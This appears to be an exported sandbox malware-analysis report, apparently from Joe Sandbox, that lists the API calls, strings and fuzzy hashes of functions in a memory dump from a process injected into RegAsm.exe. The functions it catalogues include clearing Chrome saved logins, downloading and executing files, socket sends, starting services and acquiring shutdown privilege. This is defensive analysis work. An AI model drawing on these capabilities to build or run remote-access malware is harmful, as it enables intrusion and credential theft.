                                  • Opcode Fuzzy Hash: b1399265cc0181db245dfadc9b8a2d58ab97f5fa36428480ebc21028d0ad051d
                                  • Instruction Fuzzy Hash: B3513B799002598ACF24EF78C8446FBB375FF95304F5041EAE84597250EB758EC6CB58
                                  APIs
                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040DA73
                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040DA7F
                                    • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0040DC4F
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040DC56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                  • API String ID: 2127411465-314212984
                                  • Opcode ID: af0e16ad968799b6e11fc92488445b6700a19d3771c28130d7b534f1ab2459b3
                                  • Instruction ID: 4074bb3242a5131e9af16332fb1fca2d579f27d95419dd5672c9eea20478749a
                                  • Opcode Fuzzy Hash: af0e16ad968799b6e11fc92488445b6700a19d3771c28130d7b534f1ab2459b3
                                  • Instruction Fuzzy Hash: 05C1F872A1430066C604BB76CD5B96E36A99F95748F40093FF606BB1D3ED7C9A0CC39A
                                  APIs
                                    • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                    • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                    • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                    • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                    • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C673
                                    • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044492D
                                  • IsValidCodePage.KERNEL32(00000000), ref: 00444988
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00444997
                                  • GetLocaleInfoW.KERNEL32(?,00001001,0043A13A,00000040,?,0043A25A,00000055,00000000,?,?,00000055,00000000), ref: 004449DF
                                  • GetLocaleInfoW.KERNEL32(?,00001002,0043A1BA,00000040), ref: 004449FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                  • String ID: |9E
                                  • API String ID: 745075371-2862116995
                                  • Opcode ID: 0182595e9ec61d298165f777257464cb6325a84e03ddbfac1df3a5c242788ce8
                                  • Instruction ID: a0d23eae2eab3cce0e6143c8aade0d1d31ecb2808b135d4201b82ffc1078fed3
                                  • Opcode Fuzzy Hash: 0182595e9ec61d298165f777257464cb6325a84e03ddbfac1df3a5c242788ce8
                                  • Instruction Fuzzy Hash: BD5181B1900219ABFF10EFB5DC46BBF73B8EF89701F04016AE910E7290D77899409B69
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0044496C,?,00000000), ref: 004446E6
                                  • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0044496C,?,00000000), ref: 0044470F
                                  • GetACP.KERNEL32(?,?,0044496C,?,00000000), ref: 00444724
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP$lID
                                  • API String ID: 2299586839-1000943563
                                  • Opcode ID: 535f5f0039f378c257daf72af548440bc366aacbd73dd159417f70e193030085
                                  • Instruction ID: b776c1f794edacfa1d566d42b41839c959f8c97492637f1cf3d15b7234cf2928
                                  • Opcode Fuzzy Hash: 535f5f0039f378c257daf72af548440bc366aacbd73dd159417f70e193030085
                                  • Instruction Fuzzy Hash: F421C462A00101AAF7308F64C800B97B3A6FFD6B55B578166E80AC7310FB3EDE41C758
                                  APIs
                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 00407EFC
                                  • GetLastError.KERNEL32 ref: 00407F06
                                  Strings
                                  • [Chrome StoredLogins found, cleared!], xrefs: 00407F2C
                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407EC7
                                  • UserProfile, xrefs: 00407ECC
                                  • [Chrome StoredLogins not found], xrefs: 00407F20
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteErrorFileLast
                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  • API String ID: 2018770650-1062637481
                                  • Opcode ID: 955f6442eeeee9758db619c44b27432ff1b1cda597301cc4e142a3ad0763b2b6
                                  • Instruction ID: cd3047e91bfde3af176f2c882389411367fa10c8d8f2a88c8bde0a27d8164f9d
                                  • Opcode Fuzzy Hash: 955f6442eeeee9758db619c44b27432ff1b1cda597301cc4e142a3ad0763b2b6
                                  • Instruction Fuzzy Hash: 38012631E941069BCA04BBB5CE1B8EE7724A961305F50017FFA02731D2ED7E5909C2DB
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,00000026,00000000,?,?,?,0040FC02,00000026), ref: 00410D32
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,0040FC02,00000026), ref: 00410D39
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00410D4B
                                  • AdjustTokenPrivileges.ADVAPI32(00000026,00000000,?,00000000,00000000,00000000), ref: 00410D6A
                                  • GetLastError.KERNEL32 ref: 00410D70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 3534403312-3733053543
                                  • Opcode ID: 4f0843af285c796e462775612c2307230336999f361eb92c79c5e21bd3d822b6
                                  • Instruction ID: 9eef06880bab16d35be2c706b8c727757efcd913256d8b96f55afeb896bd8697
                                  • Opcode Fuzzy Hash: 4f0843af285c796e462775612c2307230336999f361eb92c79c5e21bd3d822b6
                                  • Instruction Fuzzy Hash: 3FF03A75901128ABDB109BA0ED0DEEF7FBCEF06219F104061B905A2051D6744A09CAB5
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __floor_pentium4
                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                  • API String ID: 4168288129-2761157908
                                  • Opcode ID: 0d68c6ebbb73ac1a38bae54d0b39483b1a61521fe969ecae4c95907e74ea9d28
                                  • Instruction ID: 4aadb4acba26e1cacb22562d3062cd2e5fa0d248af99932944c2a23c9cbf1606
                                  • Opcode Fuzzy Hash: 0d68c6ebbb73ac1a38bae54d0b39483b1a61521fe969ecae4c95907e74ea9d28
                                  • Instruction Fuzzy Hash: 75C23C71E086288FEB65CE289D407EEB7B5EB44305F1545EBD40DE7240EB78AE828F45
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 004072EA
                                    • Part of subcall function 0040170E: connect.WS2_32(?,?,?), ref: 00401726
                                    • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00407382
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004073E0
                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00407438
                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?), ref: 0040744F
                                    • Part of subcall function 00401C4F: WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401C59
                                    • Part of subcall function 00401C4F: SetEvent.KERNEL32(?,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401C68
                                    • Part of subcall function 00401C4F: CloseHandle.KERNEL32(?,?,?,00000000,00401FE3,?,?,?,00401F7A), ref: 00401C71
                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0040768B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$Close$File$EventException@8FirstH_prologHandleNextObjectSingleThrowWaitconnectsend
                                  • String ID:
                                  • API String ID: 4178801697-0
                                  • Opcode ID: 36b91f3074bc9f6177dafd4d385a894127f1efee58712ea95ac6801be2b5ffbd
                                  • Instruction ID: 7202f6ce65fafa98fb7de63047c39e51e87502bb610d5f7c02fe3bbf75a70c5a
                                  • Opcode Fuzzy Hash: 36b91f3074bc9f6177dafd4d385a894127f1efee58712ea95ac6801be2b5ffbd
                                  • Instruction Fuzzy Hash: C0C1AC319001089BDB14EB60CD92AEE7779AF10318F50417EE906B71E1EB38AF49CB99
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00412DF3,00000000), ref: 00413174
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00412DF3,00000000), ref: 00413188
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00412DF3,00000000), ref: 00413195
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00412DF3,00000000), ref: 004131A0
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00412DF3,00000000), ref: 004131B2
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00412DF3,00000000), ref: 004131B5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                  • String ID:
                                  • API String ID: 276877138-0
                                  • Opcode ID: 3918c8a7ce19c406c69db840a7e5c63a46351091558a5f9bd009cd153cdc24fa
                                  • Instruction ID: 728c1f078413431713c18eccfbc5b09ab83812d1f123983b22c07ece6b5a69bb
                                  • Opcode Fuzzy Hash: 3918c8a7ce19c406c69db840a7e5c63a46351091558a5f9bd009cd153cdc24fa
                                  • Instruction Fuzzy Hash: C6F0B4795011287FE2116F259C89DBF3B6CDF863AAF040026F90993140CE788E86A5B8
                                  APIs
                                    • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                    • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                    • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                    • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0043A141,?,?,?,?,00439B98,?,00000004), ref: 00443FCB
                                  • _wcschr.LIBVCRUNTIME ref: 0044405B
                                  • _wcschr.LIBVCRUNTIME ref: 00444069
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0043A141,00000000,0043A261), ref: 0044410C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                  • String ID: |9E
                                  • API String ID: 4212172061-2862116995
                                  • Opcode ID: d99bc2a9675463053ab5ccacbb4c5199fc514b40bbba0e249075e0b3688c31d4
                                  • Instruction ID: 32e737dee43cd030fe8cef7ac27ade77768f3db5fce4e08c52ba53364ae33a46
                                  • Opcode Fuzzy Hash: d99bc2a9675463053ab5ccacbb4c5199fc514b40bbba0e249075e0b3688c31d4
                                  • Instruction Fuzzy Hash: A861FA71A00206AAF724AF76CC42BBB73A8EF44715F14052FFA05D7281EB78DD458769
                                  APIs
                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 00413B96
                                  • LoadResource.KERNEL32(00000000,?,?,0040A627,00000000), ref: 00413BAA
                                  • LockResource.KERNEL32(00000000,?,?,0040A627,00000000), ref: 00413BB1
                                  • SizeofResource.KERNEL32(00000000,?,?,0040A627,00000000), ref: 00413BC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID: SETTINGS
                                  • API String ID: 3473537107-594951305
                                  • Opcode ID: 263d98506411805d18de30793c85a23ac3b7c2f73439d8eab52d1c55755b40a5
                                  • Instruction ID: bd5ac476d8bf3fa726269e040eb6de6ac2e9741c8027eb8ad6766d5099f1ebf2
                                  • Opcode Fuzzy Hash: 263d98506411805d18de30793c85a23ac3b7c2f73439d8eab52d1c55755b40a5
                                  • Instruction Fuzzy Hash: 77E04F7EA00610AFD7212FE1AC8CD0B7EB9E7CAB52B140235FD01D7221EA768804CF59
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00407738
                                    • Part of subcall function 00406B5E: char_traits.LIBCPMT ref: 00406B79
                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004077B0
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004077D9
                                  • FindClose.KERNEL32(000000FF), ref: 004077F0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstH_prologNextchar_traits
                                  • String ID:
                                  • API String ID: 3260228402-0
                                  • Opcode ID: f2aeaa72d40e209b9df2b53be886cf0538c035a11609dda0921907f97889bebc
                                  • Instruction ID: a5bca9eea51d8a3269136c205410c130ed0051bea8ed056c38eb20d9fbddcba5
                                  • Opcode Fuzzy Hash: f2aeaa72d40e209b9df2b53be886cf0538c035a11609dda0921907f97889bebc
                                  • Instruction Fuzzy Hash: 8E9159329000199BCB15FFA1CC929EE7779AF10348F14417BE906B71E1EB39AB49CB59
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00405C93
                                  • FindFirstFileW.KERNEL32(00000000,?,004596B8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D4C
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00405D74
                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D81
                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405EE1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                  • String ID:
                                  • API String ID: 1771804793-0
                                  • Opcode ID: 1ffb65496f04ba71f834cbdae29f4aed766495b45e8c774fa02ac9e33f1099c4
                                  • Instruction ID: 644df84be1dd51f3e46be0d0b0f2c3143fee40e79e208979b12aa7b8aebd657c
                                  • Opcode Fuzzy Hash: 1ffb65496f04ba71f834cbdae29f4aed766495b45e8c774fa02ac9e33f1099c4
                                  • Instruction Fuzzy Hash: C0715C71900109AACB04FF61DD569EE7769EF20348F50417BF906B71D2EB38AB49CB98
                                  APIs
                                    • Part of subcall function 0040C60C: SetLastError.KERNEL32(0000000D,0040CB8B,00000000,00000000,?), ref: 0040C612
                                  • SetLastError.KERNEL32(000000C1,00000000,00000000,?), ref: 0040CBA2
                                  • GetNativeSystemInfo.KERNEL32(?,00000000,00000000,?), ref: 0040CC15
                                  • GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040CC81
                                  • HeapAlloc.KERNEL32(00000000), ref: 0040CC88
                                  • SetLastError.KERNEL32(0000045A), ref: 0040CD9A
                                    • Part of subcall function 0040CB1F: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040CCA1,00000000,00000000,00008000,00000000), ref: 0040CB2B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                                  • String ID:
                                  • API String ID: 486403682-0
                                  • Opcode ID: 4adddcbbc2acc18d42834cc587bd1a751958d041fb9292e9324df411bf8be2ea
                                  • Instruction ID: e6e8c6485ed81cd1fca12390261a6ee4e02eb1f9f339570914d2f341853158c0
                                  • Opcode Fuzzy Hash: 4adddcbbc2acc18d42834cc587bd1a751958d041fb9292e9324df411bf8be2ea
                                  • Instruction Fuzzy Hash: F361CF70A00201EBDB109F66C9C2B6ABBB5BF84704F14427AE905BB7C1D77CE941CB99
                                  APIs
                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00414E74
                                    • Part of subcall function 0040D202: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0040D211
                                    • Part of subcall function 0040D202: RegSetValueExA.KERNEL32(?,00459EE8,00000000,?,00000000,00000000,00467F30,?,?,0040A763,00459EE8,5.2.0 Light), ref: 0040D239
                                    • Part of subcall function 0040D202: RegCloseKey.KERNEL32(?,?,?,0040A763,00459EE8,5.2.0 Light), ref: 0040D244
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateInfoParametersSystemValue
                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                  • API String ID: 4127273184-3576401099
                                  • Opcode ID: bd12275f3f6cd1d669989ca051e00a63e2fdd3ef9dd0543eca36a2463057cf65
                                  • Instruction ID: bb2a44e1ed6c38dfa1a502633be872de791d5c7f5d259041969d25b46d9350ba
                                  • Opcode Fuzzy Hash: bd12275f3f6cd1d669989ca051e00a63e2fdd3ef9dd0543eca36a2463057cf65
                                  • Instruction Fuzzy Hash: F111A172B8030077D909303A0D5BFAE2C159B92B52F95016BFE017A2D7E9DE4A9903CF
                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004321E4
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004321EE
                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004321FB
                                  Strings
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 00432105
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  • API String ID: 3906539128-1068371695
                                  • Opcode ID: 17a952e660d70814d57f60f7e6f4e4c9fa82c9629f664b16cd2a329d852c6d80
                                  • Instruction ID: 35e80af348abaaee4114425dc0c0632cf56bb04d932113a279ddada4047cb47e
                                  • Opcode Fuzzy Hash: 17a952e660d70814d57f60f7e6f4e4c9fa82c9629f664b16cd2a329d852c6d80
                                  • Instruction Fuzzy Hash: 7D31D574D412289BCB21DF65DD89B9DB7B8BF08310F5042EAE81CA7251E7749B818F49
                                  APIs
                                    • Part of subcall function 00414452: GetCurrentProcess.KERNEL32(00000000,?,00000002,0040907E,WinDir,00000000,00000000), ref: 00414463
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A81F
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040A841
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A9C8
                                  • CloseHandle.KERNEL32(00000000), ref: 0040A9D7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 592884611-0
                                  • Opcode ID: 56ed749abff6f236e056cd0dd77af98e6714c1e0ba7085316581fe8596d45ad3
                                  • Instruction ID: 243f6cd1f81f9c8f55a8f0024b00723f56764068984f0561bc3222dd9606701d
                                  • Opcode Fuzzy Hash: 56ed749abff6f236e056cd0dd77af98e6714c1e0ba7085316581fe8596d45ad3
                                  • Instruction Fuzzy Hash: 6B412031A102299BC715FB61DC56AEEB378AF50304F1040BFF60A761D2EE785EC9CA59
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00404B51
                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00404BE8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DownloadExecuteFileShell
                                  • String ID: open
                                  • API String ID: 2825088817-2758837156
                                  • Opcode ID: 3fb3a80cf2e6475b59f25c82e33835eae668523d95a8c683cc80ed935d5ac12b
                                  • Instruction ID: e27ae4924a228426fb0fa60c58d648a9e47e27aaaaa9c80784e0ca9243a57cd1
                                  • Opcode Fuzzy Hash: 3fb3a80cf2e6475b59f25c82e33835eae668523d95a8c683cc80ed935d5ac12b
                                  • Instruction Fuzzy Hash: 0641F47160430066DA15FA31C95AAAE37A99BD1705F40093FBB427B1D2EE7C9A0CC75A
                                  APIs
                                    • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                    • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                    • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                    • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                    • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C673
                                    • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444328
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444379
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444439
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                  • String ID:
                                  • API String ID: 2829624132-0
                                  • Opcode ID: 32f4b9d895ea98af3fd9a5171a8db8fa53e4e0c53919800eec0ada9f8816a44a
                                  • Instruction ID: 1f87c0796c419ade2eae767289d25b359e6e8943c577617cf55981828d241cac
                                  • Opcode Fuzzy Hash: 32f4b9d895ea98af3fd9a5171a8db8fa53e4e0c53919800eec0ada9f8816a44a
                                  • Instruction Fuzzy Hash: C7619371500207ABFF289F24CC82BBA77A8EF44704F1441BAED05D6681EB7CD992DB58
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000003,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002,00000000,?,0043B5D8,00000003), ref: 004389A4
                                  • TerminateProcess.KERNEL32(00000000,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002,00000000,?,0043B5D8,00000003), ref: 004389AB
                                  • ExitProcess.KERNEL32 ref: 004389BD
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: 028ca32864a5d8a00decbcdfeac547a14969b7e8f12dafd009958018ff53265b
                                  • Instruction ID: ad1314456494e3ed302f9715d1c959e7e451621885e8079f11eafe7d6208c2ac
                                  • Opcode Fuzzy Hash: 028ca32864a5d8a00decbcdfeac547a14969b7e8f12dafd009958018ff53265b
                                  • Instruction Fuzzy Hash: 12E0B675900648ABCF226F65DD09A597B69FF89345F40106AF90A8A221CB79ED42CB88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .
                                  • API String ID: 0-248832578
                                  • Opcode ID: 6eabc5f11ec1ca2a56f69ff92e525cdbe2e1dd9f0c076f28e47ccd50a7368115
                                  • Instruction ID: 5f8074742a1868b626ed342c3e98615176126d660209178caf4e6f80b034c56a
                                  • Opcode Fuzzy Hash: 6eabc5f11ec1ca2a56f69ff92e525cdbe2e1dd9f0c076f28e47ccd50a7368115
                                  • Instruction Fuzzy Hash: 753137719002486FEB24DE79CC84EFB7BBDDB85308F1002AEFA5897251E634AD518B54
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00439B98,?,00000004), ref: 0043D37F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: GetLocaleInfoEx
                                  • API String ID: 2299586839-2904428671
                                  • Opcode ID: b71d05b3c7fe1d4ca99e8279e8949133a53b058c086b6bf9e28b218b471bedce
